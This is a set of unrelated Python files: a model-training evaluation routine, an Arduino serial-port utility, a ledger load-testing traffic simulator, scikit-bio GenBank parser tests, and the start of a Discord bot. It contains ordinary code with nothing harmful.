metric = load_metric("/content/glue_metrics.py", task_to_metrics[data_args.task_name])
# TODO: When datasets metrics include regular accuracy, make an else here and remove special branch from
# compute_metrics
# You can define your custom compute_metrics function. It takes an `EvalPrediction` object (a namedtuple with a
# predictions and label_ids field) and has to return a dictionary string to float.
def compute_metrics(p: EvalPrediction):
preds = p.predictions[0] if isinstance(p.predictions, tuple) else p.predictions
preds = np.squeeze(preds) if is_regression else np.argmax(preds, axis=1)
if data_args.task_name is not None:
result = metric.compute(predictions=preds, references=p.label_ids)
if len(result) > 1:
result["combined_score"] = np.mean(list(result.values())).item()
return result
elif is_regression:
return {"mse": ((preds - p.label_ids) ** 2).mean().item()}
else:
return {"accuracy": (preds == p.label_ids).astype(np.float32).mean().item()}
if not tf.io.gfile.exists(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1])):
tf.io.gfile.makedirs(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1]))
tf.io.gfile.makedirs(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1], 'flue'))
tf.io.gfile.makedirs(
os.path.join(training_args.output_dir, model_args.model_name_or_path.split('/')[-1], 'flue', data_args.task_name))
output_dir = '{}/{}/flue/{}/{}_{}_{}'.format(
training_args.output_dir,
model_args.model_name_or_path.split('/')[-1],
data_args.task_name,
str(seed),
str(training_args.learning_rate),
str(training_args.train_batch_size))
training_args.output_dir = output_dir
training_args.save_steps = 10000
training_args.save_total_limit = 2
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset if training_args.do_eval else None,
compute_metrics=compute_metrics,
tokenizer=tokenizer,
# Data collator will default to DataCollatorWithPadding, so we change it if we already did the padding.
data_collator=default_data_collator if data_args.pad_to_max_length else None,
)
# Training
if training_args.do_train:
trainer.train()
# trainer.train(
# model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None
# )
trainer.save_model() # Saves the tokenizer too for easy upload
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
eval_result = trainer.evaluate(eval_dataset=eval_dataset)
test_result = trainer.evaluate(eval_dataset=test_dataset)
dev_metric_1 = eval_result['eval_accuracy']
test_metric_1 = test_result['eval_accuracy']
if data_args.task_name in ['WSD']:
dev_metric_2 = eval_result['f1']
test_metric_2 = test_result['f1']
else:
dev_metric_2 = 0
test_metric_2 = 0
eval_results[output_dir] = DevResult(seed, training_args.learning_rate, training_args.train_batch_size,
dev_metric_1, dev_metric_2,
eval_result['eval_loss'])
test_results[output_dir] = DevResult(seed, training_args.learning_rate, training_args.train_batch_size,
test_metric_1, test_metric_2,
test_result['eval_loss'])
if trainer.is_world_process_zero():
logger.info(f"***** Eval results {data_args.task_name} *****")
for key, value in eval_result.items():
logger.info(f" {key} = {value}")
if training_args.do_predict:
logger.info("*** Test ***")
best_result = -1
for k, v in eval_results.items():
if v.eval_metric_1 > best_result:
best_result = v.eval_metric_1
best_result_2 = v.eval_metric_2
best_estimator_output_dir = k
best_estimator_learning_rate = v.learning_rate
best_estimator_train_batch_size = v.batch_size
best_seed = v.seed
same_seed_results_1 = []
same_seed_results_2 = []
for k, v in eval_results.items():
if (best_estimator_learning_rate == v.learning_rate) and (best_estimator_train_batch_size == v.batch_size):
same_seed_results_1.append(v.eval_metric_1)
same_seed_results_2.append(v.eval_metric_2)
print('\nhyper-parameters: seed: {} lr: {} and batch size: {} saved in dir: {}'
.format(best_seed, best_estimator_learning_rate, best_estimator_train_batch_size,
best_estimator_output_dir))
print('\n best dev results 1: {}, avg: {}, std: {}, best dev results 2: {}, : avg: {}, std: {}'.format(
round(best_result * 100, 1), round(np.mean(same_seed_results_1) * 100, 1),
round(np.std(same_seed_results_1) * 100, 1),
round(best_result_2 * 100, 1),
round(np.mean(same_seed_results_2) * 100, 1), round(np.std(same_seed_results_2) * 100, 1)))
best_test_results = test_results[best_estimator_output_dir]
logger.info(f"***** Test results {data_args.task_name} *****")
logger.info(f" eval_metric_1 = {best_test_results.eval_metric_1}")
logger.info(f" eval_metric_2 = {best_test_results.eval_metric_2}")
print("***** Test results {} *****".format(data_args.task_name))
print(" eval_metric_1 = {}".format(best_test_results.eval_metric_1))
print(" eval_metric_2 = {}".format(best_test_results.eval_metric_2))
return eval_results
def _mp_fn(index):
# For xla_spawn (TPUs)
main()
if __name__ == "__main__":
main()
|
#!/usr/bin/env python
#
# Copyright 2007 <NAME> <<EMAIL>>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
A port of Tod E. Kurt's arduino-serial.c.
<http://todbot.com/blog/2006/12/06/arduino-serial-c-code-to-talk-to-arduino/>
"""
import termios
import fcntl
import os
import sys
import time
import getopt
# Map from the numbers to the termios constants (which are pretty much
# the same numbers).
BPS_SYMS = {
4800: termios.B4800,
9600: termios.B9600,
19200: termios.B19200,
38400: termios.B38400,
57600: termios.B57600,
115200: termios.B115200
}
# Indices into the termios tuple.
IFLAG = 0
OFLAG = 1
CFLAG = 2
LFLAG = 3
ISPEED = 4
OSPEED = 5
CC = 6
def bps_to_termios_sym(bps):
return BPS_SYMS[bps]
class SerialPort:
def __init__(self, serialport, bps):
"""Takes the string name of the serial port
(e.g. "/dev/tty.usbserial","COM1") and a baud rate (bps) and
connects to that port at that speed and 8N1. Opens the port in
fully raw mode so you can send binary data.
"""
self.fd = os.open(serialport, os.O_RDWR | os.O_NOCTTY | os.O_NDELAY)
attrs = termios.tcgetattr(self.fd)
bps_sym = bps_to_termios_sym(bps)
# Set I/O speed.
attrs[ISPEED] = bps_sym
attrs[OSPEED] = bps_sym
# 8N1
attrs[CFLAG] &= ~termios.PARENB
attrs[CFLAG] &= ~termios.CSTOPB
attrs[CFLAG] &= ~termios.CSIZE
attrs[CFLAG] |= termios.CS8
# No flow control
attrs[CFLAG] &= ~termios.CRTSCTS
# Turn on READ & ignore contrll lines.
attrs[CFLAG] |= termios.CREAD | termios.CLOCAL
# Turn off software flow control.
attrs[IFLAG] &= ~(termios.IXON | termios.IXOFF | termios.IXANY)
# Make raw.
attrs[LFLAG] &= ~(termios.ICANON | termios.ECHO | termios.ECHOE | termios.ISIG)
attrs[OFLAG] &= ~termios.OPOST
# It's complicated--See
# http://unixwiz.net/techtips/termios-vmin-vtime.html
attrs[CC][termios.VMIN] = 0;
attrs[CC][termios.VTIME] = 20;
termios.tcsetattr(self.fd, termios.TCSANOW, attrs)
def read_until(self, until):
buf = ""
done = False
while not done:
n = os.read(self.fd, 1)
if n == '':
# FIXME: Maybe worth blocking instead of busy-looping?
time.sleep(0.01)
continue
buf = buf + n
if n == until:
done = True
return buf
def write(self, str):
os.write(self.fd, str)
def write_byte(self, byte):
os.write(self.fd, chr(byte))
def main(args):
port = None
bps = 9600
try:
optlist, args = getopt.getopt(args[1:], 'hp:b:s:rn:d:',
['help', 'port=', 'baud=', 'send=', 'receive',
'num=', 'delay='])
for (o, v) in optlist:
if o == '-d' or o == '--delay':
n = float(v) / 1000.0
time.sleep(n)
elif o == '-h' or o =='--help':
usage()
elif o == '-b' or o =='--baud':
bps = int(v)
elif o == '-p' or o =='--port':
port = SerialPort(v, bps)
elif o =='-n' or o =='--num':
n = int(v)
port.write_byte(n)
elif o == '-s' or o == '--send':
port.write(v)
elif o == '-r' or o == '--receive':
print "Read %s" % (port.read_until('\n'),)
sys.exit(0)
except getopt.GetoptError, e:
sys.stderr.write("%s: %s\n" % (args[0], e.msg))
usage()
sys.exit(1)
def usage():
print """Usage: arduino-serial.py -p <serialport> [OPTIONS]
Options:
-h, --help Print this help message.
-p, --port=SERIALPORT Serial port Arduino is on.
-b, --baud=BAUDRATE Baudrate (bps) of Arduino.
-s, --send=DATA Send data to Arduino.
-r, --receive Receive data from Arduino & print it out.
-n --num=NUM Send a number as a single byte.
-d --delay=MILLIS Delay for specified milliseconds.
Note: Order is important. Set '-b' before doing '-p'.
Used to make series of actions: '-d 2000 -s hello -d 100 -r'
means 'wait 2 seconds, send 'hello', wait 100 msec, get reply'.
"""
if __name__ == '__main__':
main(sys.argv)
|
"""
Created on Feb 27, 2018
@author: nhan.nguyen
This module contains class "TesterSimulateTraffic" that simulates the real time
traffic.
"""
import threading
import random
import time
import utils
import os
import asyncio
import argparse
import requests_sender
import requests_builder
import perf_add_requests
from perf_tester import Tester
class Option:
def __init__(self):
parser = argparse.ArgumentParser(
description='Script to simulate the traffic which will send'
'request to ledger in several sets. Each set contains '
'a specified number of requests and between two set, '
'the system will be delayed for a random length of'
' time (from 1 to 10 seconds).\n\n',
usage='To create 5 client to simulate the traffic in 50 seconds '
'and you want each set contains 100 request.'
'\nuse: python3.6 perf_traffic.py -c 5 -t 50 -n 100')
parser.add_argument('-c',
help='Specify the number of clients '
'will be simulated. Default value will be 1.',
action='store',
type=int, default=1, dest='clients')
parser.add_argument('-n',
help='Number of transactions will be sent '
'in a set. Default value will be 100.',
action='store', type=int,
default=100, dest='transactions_delay')
parser.add_argument('--log',
help='To see all log. If this flag does not exist,'
'program just only print fail message',
action='store_true', default=False, dest='log')
parser.add_argument('-to',
help='Timeout of testing. '
'Default value will be 100.',
action='store', type=int,
default=100, dest='time_out')
parser.add_argument('--init',
help='To build "GET" request, we need to '
'send "ADD" request first. This argument is '
'the number of "ADD" request will be sent '
'to ledger to make sample for "GET" requests.'
' Default value will be 100',
action='store', type=int,
default=100, dest='number_of_request_samples')
self.args = parser.parse_args()
def catch_number_of_request_samples():
"""
Parse number of sample of "GET" requests will be created.
If the number is less than of equal with zero, default value (100) will be
returned.
:return: number of sample of "GET" requests.
"""
import sys
result = 100
if "--init" in sys.argv:
index = sys.argv.index("--init")
if index < len(sys.argv) - 1:
temp = -1
try:
temp = int(sys.argv[index + 1])
except ValueError:
pass
if temp > 0:
result = temp
return result
class TesterSimulateTraffic(Tester):
__sample_req_info = {}
__kinds_of_request = ["nym", "attribute", "schema", "claim",
"get_nym", "get_attribute", "get_schema",
"get_claim"]
__number_of_request_samples = catch_number_of_request_samples()
def __init__(self, number_of_clients: int = 2,
transactions_delay: int = 100,
time_out: int = 300, log=False,
seed="000000000000000000000000Trustee1"):
super().__init__(log=log, seed=seed)
utils.run_async_method(
None, TesterSimulateTraffic._prepare_samples_for_get_req,
TesterSimulateTraffic.__number_of_request_samples)
if time_out <= 0 or transactions_delay <= 0 or number_of_clients <= 0:
return
self.transactions_delay = transactions_delay
self.time_out = time_out
self.number_of_clients = number_of_clients
self.current_total_txn = 0
self.__current_time = time.time()
self.__lock = threading.Lock()
self.__sender = requests_sender.RequestsSender()
async def _test(self):
"""
Override from "Tester" class to implement testing steps.
"""
lst_threads = list()
self.__current_time = time.time()
for _ in range(self.number_of_clients):
thread = threading.Thread(target=self.__simulate_client)
thread.setDaemon(True)
thread.start()
lst_threads.append(thread)
for thread in lst_threads:
thread.join(self.time_out * 1.1)
self.passed_req = self.__sender.passed_req
self.failed_req = self.__sender.failed_req
self.fastest_txn = self.__sender.fastest_txn
self.lowest_txn = self.__sender.lowest_txn
def __update(self):
"""
Synchronize within threads to update some necessary information.
"""
self.__lock.acquire()
if self.start_time == 0 and self.finish_time != 0:
self.start_time = self.finish_time
if self.current_total_txn != 0 and \
self.current_total_txn % self.transactions_delay == 0:
time.sleep(random.randint(1, 10))
self.current_total_txn += 1
self.__lock.release()
def __simulate_client(self):
"""
Simulate a client to create real time traffic.
"""
loop = asyncio.new_event_loop()
args = {"wallet_handle": self.wallet_handle,
"pool_handle": self.pool_handle,
"submitter_did": self.submitter_did}
asyncio.set_event_loop(loop)
while True:
self.__update()
if time.time() - self.__current_time >= self.time_out:
break
self.finish_time = utils.run_async_method(
loop, TesterSimulateTraffic._build_and_send_request,
self.__sender, args)
loop.close()
@staticmethod
async def generate_sample_request_info(kind,
sample_num: int = 100) -> list:
"""
Generate sample request information.
:param kind: kind of request.
:param sample_num: number of samples will be generated.
:return: a list of samples request information.
"""
kinds = ["nym", "schema", "attribute", "claim"]
if kind not in kinds or sample_num <= 0:
return []
generator = perf_add_requests.PerformanceTesterForAddingRequest(
request_num=sample_num, request_kind=kind)
await generator.test()
lst_info = list()
with open(generator.info_file_path, "r") as info_file:
for line in info_file:
if len(line) > 2:
lst_info.append(line)
try:
os.remove(generator.info_file_path)
except IOError:
pass
return lst_info
@staticmethod
async def _prepare_samples_for_get_req(sample_num: int = 100):
"""
Init samples for "GET" requests.
:param sample_num: create a number of samples request information for
each kind of request (nym, attribute, claim, schema)
"""
if TesterSimulateTraffic.__sample_req_info:
return
keys = ["nym", "attribute", "schema", "claim"]
if sample_num <= 0:
return
for key in keys:
TesterSimulateTraffic.__sample_req_info[key] = \
await TesterSimulateTraffic.generate_sample_request_info(
key, sample_num)
@staticmethod
def _random_req_kind():
"""
Random choice a request kind.
:return: request kind.
"""
return random.choice(TesterSimulateTraffic.__kinds_of_request)
@staticmethod
def _random_sample_for_get_request(kind: str):
"""
Choice randomly a sample of request info base on kind of request.
:param kind: kind of request (get_nym, get_attribute,
get_claim, get_schema).
:return: a random sample of request info.
"""
if kind.startswith("get_"):
return random.choice(
TesterSimulateTraffic.__sample_req_info[kind.replace(
"get_", "")])
return ""
@staticmethod
async def _build_and_send_request(sender, args):
"""
Build a request and send it onto ledger.
:param sender: send the request.
:param args: contains some arguments to send request to ledger
(pool handle, wallet handle, submitter did)
:return: response time.
"""
kind = TesterSimulateTraffic._random_req_kind()
data = TesterSimulateTraffic._random_sample_for_get_request(kind)
req = await requests_builder.RequestBuilder.build_request(args, kind,
data)
return await sender.send_request(args, kind, req)
if __name__ == '__main__':
opts = Option().args
tester = TesterSimulateTraffic(number_of_clients=opts.clients,
transactions_delay=opts.transactions_delay,
time_out=opts.time_out, log=opts.log)
utils.run_async_method(None, tester.test)
elapsed_time = tester.finish_time - tester.start_time
utils.print_client_result(tester.passed_req, tester.failed_req,
elapsed_time)
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
from future.builtins import map, zip
import io
import numpy as np
import pandas as pd
import numpy.testing as npt
import six
from unittest import TestCase, main
from datetime import datetime
from skbio import Protein, DNA, RNA, Sequence
from skbio.util import get_data_path
from skbio.io import GenBankFormatError
from skbio.io.format.genbank import (
_genbank_sniffer,
_genbank_to_generator, _genbank_to_sequence,
_genbank_to_dna, _genbank_to_rna, _genbank_to_protein,
_parse_locus, _parse_reference,
_parse_loc_str, _parse_section_default,
_generator_to_genbank, _sequence_to_genbank,
_protein_to_genbank, _rna_to_genbank, _dna_to_genbank,
_serialize_locus)
class SnifferTests(TestCase):
def setUp(self):
self.positive_fps = list(map(get_data_path, [
'genbank_5_blanks_start_of_file',
'genbank_single_record_upper',
'genbank_single_record_lower',
'genbank_multi_records']))
self.negative_fps = list(map(get_data_path, [
'empty',
'whitespace_only',
'genbank_6_blanks_start_of_file',
'genbank_w_beginning_whitespace',
'genbank_missing_locus_name']))
def test_positives(self):
for fp in self.positive_fps:
self.assertEqual(_genbank_sniffer(fp), (True, {}))
def test_negatives(self):
for fp in self.negative_fps:
self.assertEqual(_genbank_sniffer(fp), (False, {}))
class GenBankIOTests(TestCase):
# parent class to set up test data for the child class
def setUp(self):
# test locus line
self.locus = (
(['LOCUS NC_005816 9609 bp '
'DNA circular CON 07-FEB-2015'],
{'division': 'CON', 'mol_type': 'DNA', 'shape': 'circular',
'locus_name': 'NC_005816', 'date': datetime(2015, 2, 7, 0, 0),
'unit': 'bp', 'size': 9609}),
(['LOCUS SCU49845 5028 bp '
'DNA PLN 21-JUN-1999'],
{'division': 'PLN', 'mol_type': 'DNA', 'shape': None,
'locus_name': 'SCU49845', 'date': datetime(1999, 6, 21, 0, 0),
'unit': 'bp', 'size': 5028}),
(['LOCUS NP_001832 360 aa '
'linear PRI 18-DEC-2001'],
{'division': 'PRI', 'mol_type': None, 'shape': 'linear',
'locus_name': 'NP_001832', 'date': datetime(2001, 12, 18, 0, 0),
'unit': 'aa', 'size': 360}))
# test single record and read uppercase sequence
self.single_upper_fp = get_data_path('genbank_single_record_upper')
self.single_lower_fp = get_data_path('genbank_single_record_lower')
self.single = (
'GSREILDFK',
{'LOCUS': {'date': datetime(1994, 9, 23, 0, 0),
'division': 'BCT',
'locus_name': 'AAB29917',
'mol_type': None,
'shape': 'linear',
'size': 9,
'unit': 'aa'}},
None,
Protein)
self.single_rna_fp = get_data_path('genbank_single_record')
self.single_rna = (
'gugaaacaaagcacuauugcacuggcugucuuaccguuacuguuuaccccugugacaaaagcc',
{'ACCESSION': 'M14399',
'COMMENT': 'Original source text: E.coli, cDNA to mRNA.',
'DEFINITION': u"alkaline phosphatase signal mRNA, 5' end.",
'FEATURES': [{'db_xref': '"taxon:562"',
'index_': 0,
'left_partial_': False,
'location': '1..63',
'mol_type': '"mRNA"',
'organism': '"Escherichia coli"',
'rc_': False,
'right_partial_': False,
'type_': 'source'},
{'codon_start': '1',
'db_xref': [
'"GI:145230"', '"taxon:562"', '"taxon:561"'],
'index_': 1,
'left_partial_': False,
'location': '1..>63',
'note': '"alkaline phosphatase signal peptide"',
'protein_id': '"AAA23431.1"',
'rc_': False,
'right_partial_': True,
'transl_table': '11',
'translation': '"MKQSTIALAVLPLLFTPVTKA"',
'type_': 'CDS'}],
'KEYWORDS': 'alkaline phosphatase; signal peptide.',
'LOCUS': {'date': datetime(1993, 4, 26, 0, 0),
'division': 'BCT',
'locus_name': 'ECOALKP',
'mol_type': 'mRNA',
'shape': 'linear',
'size': 63,
'unit': 'bp'},
'SOURCE': {'ORGANISM': 'Escherichia coli',
'taxonomy': 'Bacteria; Proteobacteria; '
'Gammaproteobacteria; Enterobacteriales; '
'Enterobacteriaceae; Escherichia.'},
'VERSION': 'M14399.1 GI:145229'},
pd.DataFrame({0: np.ones(63, dtype=bool),
1: np.ones(63, dtype=bool)}),
RNA)
# test:
# 1. multiple records in one file
# 2. lowercase sequence
# 3. DNA, RNA, Protein type
# 4. variation of formats
self.multi_fp = get_data_path('genbank_multi_records')
self.multi = (
('gsreildfk',
{'ACCESSION': 'AAB29917',
'COMMENT': 'Method: direct peptide sequencing.',
'DBSOURCE': 'accession AAB29917.1',
'DEFINITION': 'L-carnitine amidase {N-terminal}',
'FEATURES': [{'index_': 0,
'left_partial_': False,
'location': '1..9',
'organism': '"Bacteria"',
'rc_': False,
'right_partial_': False,
'type_': 'source'},
{'index_': 1,
'left_partial_': False,
'location': '1..>9',
'product': '"L-carnitine amidase"',
'rc_': False,
'right_partial_': True,
'type_': 'Protein'}],
'KEYWORDS': '.',
'LOCUS': {'date': datetime(1994, 9, 23, 0, 0),
'division': 'BCT',
'locus_name': 'AAB29917',
'mol_type': None,
'shape': 'linear',
'size': 9,
'unit': 'aa'},
'REFERENCE': [{'AUTHORS': 'Joeres,U. and Kula,M.R.',
'JOURNAL': 'AMB 40 (5), 606-610 (1994)',
'PUBMED': '7764422',
'REFERENCE': '1 (residues 1 to 9)',
'REMARK': 'from the original journal article.',
'TITLE': 'a microbial L-carnitine amidase'},
{'AUTHORS': 'Joeres,U. and Kula,M.R.',
'JOURNAL': 'AMB 40 (5), 606-610 (1994)',
'PUBMED': '7764422',
'REFERENCE': '1 (residues 1 to 9)',
'TITLE': 'a microbial L-carnitine amidase'}],
'SOURCE': {'ORGANISM': 'Bacteria',
'taxonomy': 'Unclassified.'},
'VERSION': 'AAB29917.1 GI:545426'},
pd.DataFrame({0: np.ones(9, dtype=bool),
1: np.ones(9, dtype=bool)}),
Protein),
('catgcaggc',
{'ACCESSION': 'HQ018078',
'DEFINITION': 'Uncultured Xylanimonas sp.16S, partial',
'FEATURES': [{'country': '"Brazil: Parana, Paranavai"',
'environmental_sample': '',
'index_': 0,
'left_partial_': False,
'location': '1..9',
'rc_': False,
'right_partial_': False,
'type_': 'source'},
{'index_': 1,
'left_partial_': True,
'location': 'complement(<2..>8)',
'product': '"16S ribosomal RNA"',
'rc_': True,
'right_partial_': True,
'type_': 'rRNA'}],
'KEYWORDS': 'ENV.',
'LOCUS': {'date': datetime(2010, 8, 29, 0, 0),
'division': 'ENV',
'locus_name': 'HQ018078',
'mol_type': 'DNA',
'shape': 'linear',
'size': 9,
'unit': 'bp'},
'SOURCE': {'ORGANISM': 'uncultured Xylanimonas sp.',
'taxonomy': 'Bacteria; Actinobacteria; '
'Micrococcales; Promicromonosporaceae; '
'Xylanimonas; environmental samples.'},
'VERSION': 'HQ018078.1 GI:304421728'},
pd.DataFrame({0: [True] * 9,
1: [False] + [True] * 7 + [False]}),
DNA))
class ReaderTests(GenBankIOTests):
def test_parse_reference(self):
lines = '''
REFERENCE 1 (bases 1 to 154478)
AUTHORS Sato,S., Nakamura,Y., Kaneko,T., and Tabata,S.
TITLE Complete structure of the chloroplast genome of
Arabidopsis thaliana
JOURNAL DNA Res. 6 (5), 283-290 (1999)
PUBMED 10574454'''.split('\n')
exp = {'AUTHORS': 'Sato,S., Nakamura,Y., Kaneko,T., and Tabata,S.',
'JOURNAL': 'DNA Res. 6 (5), 283-290 (1999)',
'PUBMED': '10574454',
'REFERENCE': '1 (bases 1 to 154478)',
'TITLE': ('Complete structure of the chloroplast genome of'
' Arabidopsis thaliana')}
self.assertEqual(_parse_reference(lines), exp)
def test_parse_locus(self):
for serialized, parsed in self.locus:
self.assertEqual(_parse_locus(serialized), parsed)
def test_parse_locus_invalid(self):
lines = [
# missing unit
['LOCUS NC_005816 9609 '
' DNA circular CON 07-FEB-2015'],
# missing division
['LOCUS SCU49845 5028 bp'
' DNA 21-JUN-1999'],
# wrong date format
['LOCUS NP_001832 360 aa'
' linear PRI 2001-12-18']]
for line in lines:
with six.assertRaisesRegex(self, GenBankFormatError,
'Could not parse the LOCUS line:.*'):
_parse_locus(line)
def test_parse_section_default(self):
lines = [
['FOO blah blah',
' blah'],
['FOO=blah',
' blah'],
['FOO']]
kwargs = [{'join_delimitor': '=', 'return_label': False},
{'label_delimitor': '=', 'join_delimitor': '',
'return_label': True},
{'label_delimitor': '=', 'join_delimitor': '=',
'return_label': True}]
expects = ['blah blah=blah',
('FOO', 'blahblah'),
('FOO', '')]
for i, j, k in zip(lines, kwargs, expects):
self.assertEqual(k, _parse_section_default(i, **j))
def test_parse_loc_str(self):
length = 12
examples = [
'',
'9', # a single base in the presented sequence
'3..8',
'<3..8',
'1..>8',
'complement(3..8)',
'complement(join(3..5,7..9))',
'join(3..5,7..9)',
'J00194.1:1..9',
'1.9',
'1^9']
expects = [
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': True, 'rc_': False},
np.array([0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': True, 'left_partial_': False, 'rc_': False},
np.array([1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': True},
np.array([0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': True},
np.array([0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.array([0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 0, 0], dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.zeros(length, dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.zeros(length, dtype=bool)),
({'right_partial_': False, 'left_partial_': False, 'rc_': False},
np.zeros(length, dtype=bool))]
for example, expect in zip(examples, expects):
parsed = _parse_loc_str(example, length)
self.assertDictEqual(parsed[0], expect[0])
npt.assert_equal(parsed[1], expect[1])
def test_parse_loc_str_invalid(self):
length = 12
examples = [
'abc',
'3-8']
for example in examples:
with six.assertRaisesRegex(self, GenBankFormatError,
'Could not parse location string: '
'"%s"' % example):
_parse_loc_str(example, length)
def test_genbank_to_generator_single(self):
# test single record and uppercase sequence
for c in [Sequence, Protein]:
obs = next(_genbank_to_generator(
self.single_upper_fp, constructor=c))
exp = c(self.single[0], metadata=self.single[1],
positional_metadata=self.single[2])
self.assertEqual(exp, obs)
def test_genbank_to_generator(self):
for i, obs in enumerate(_genbank_to_generator(self.multi_fp)):
seq, md, pmd, constructor = self.multi[i]
exp = constructor(seq, metadata=md, lowercase=True,
positional_metadata=pmd)
self.assertEqual(exp, obs)
def test_genbank_to_sequence(self):
for i, exp in enumerate(self.multi):
obs = _genbank_to_sequence(self.multi_fp, seq_num=i+1)
exp = Sequence(exp[0], metadata=exp[1], lowercase=True,
positional_metadata=exp[2])
self.assertEqual(exp, obs)
def test_genbank_to_rna(self):
seq, md, pmd, constructor = self.single_rna
obs = _genbank_to_rna(self.single_rna_fp)
exp = constructor(seq, metadata=md,
lowercase=True, positional_metadata=pmd)
self.assertEqual(exp, obs)
def test_genbank_to_dna(self):
i = 1
exp = self.multi[i]
obs = _genbank_to_dna(self.multi_fp, seq_num=i+1)
exp = DNA(exp[0], metadata=exp[1], lowercase=True,
positional_metadata=exp[2])
self.assertEqual(exp, obs)
def test_genbank_to_protein(self):
i = 0
exp = self.multi[i]
obs = _genbank_to_protein(self.multi_fp, seq_num=i+1)
exp = Protein(exp[0], metadata=exp[1],
lowercase=True, positional_metadata=exp[2])
self.assertEqual(exp, obs)
class WriterTests(GenBankIOTests):
def test_serialize_locus(self):
for serialized, parsed in self.locus:
self.assertEqual(
_serialize_locus('LOCUS', parsed), serialized[0] + '\n')
def test_generator_to_genbank(self):
seq, md, pmd, constructor = self.single
obj = constructor(seq, md, pmd)
fh = io.StringIO()
_generator_to_genbank([obj], fh)
obs = fh.getvalue()
fh.close()
with io.open(self.single_lower_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_sequence_to_genbank(self):
fh = io.StringIO()
for i, (seq, md, pmd, constructor) in enumerate(self.multi):
obj = Sequence(seq, md, pmd, lowercase=True)
_sequence_to_genbank(obj, fh)
obs = fh.getvalue()
fh.close()
with io.open(self.multi_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_dna_protein_to_genbank(self):
writers = [_protein_to_genbank,
_dna_to_genbank]
fh = io.StringIO()
for i, (seq, md, pmd, constructor) in enumerate(self.multi):
obj = constructor(seq, md, pmd, lowercase=True)
writers[i](obj, fh)
obs = fh.getvalue()
fh.close()
with io.open(self.multi_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_rna_to_genbank(self):
fh = io.StringIO()
seq, md, pmd, constructor = self.single_rna
obj = constructor(seq, md, pmd, lowercase=True)
_rna_to_genbank(obj, fh)
obs = fh.getvalue()
fh.close()
with io.open(self.single_rna_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
class RoundtripTests(GenBankIOTests):
def test_roundtrip_generator(self):
fh = io.StringIO()
_generator_to_genbank(_genbank_to_generator(self.multi_fp), fh)
obs = fh.getvalue()
fh.close()
with io.open(self.multi_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_roundtrip_rna(self):
fh = io.StringIO()
_rna_to_genbank(_genbank_to_rna(self.single_rna_fp), fh)
obs = fh.getvalue()
fh.close()
with io.open(self.single_rna_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_roundtrip_dna(self):
fh = io.StringIO()
_dna_to_genbank(_genbank_to_dna(self.single_rna_fp), fh)
obs = fh.getvalue()
fh.close()
with io.open(self.single_rna_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_roundtrip_protein(self):
fh = io.StringIO()
_protein_to_genbank(_genbank_to_protein(self.single_lower_fp), fh)
obs = fh.getvalue()
fh.close()
with io.open(self.single_lower_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
def test_roundtrip_sequence(self):
fh = io.StringIO()
_sequence_to_genbank(_genbank_to_sequence(self.single_rna_fp), fh)
obs = fh.getvalue()
fh.close()
with io.open(self.single_rna_fp) as fh:
exp = fh.read()
self.assertEqual(obs, exp)
if __name__ == '__main__':
main()
|
print("STONK:D")
# bot.py
from operator import truediv
import os
import discord
from discord import embeds
from discord import member
#from dotenv import load_dotenv
from discord.ext import commands
import discord
from io import BytesIO
import json
import random
#from utils.useful import Embed
import DiscordUtils
#from keep_alive import keep_alive
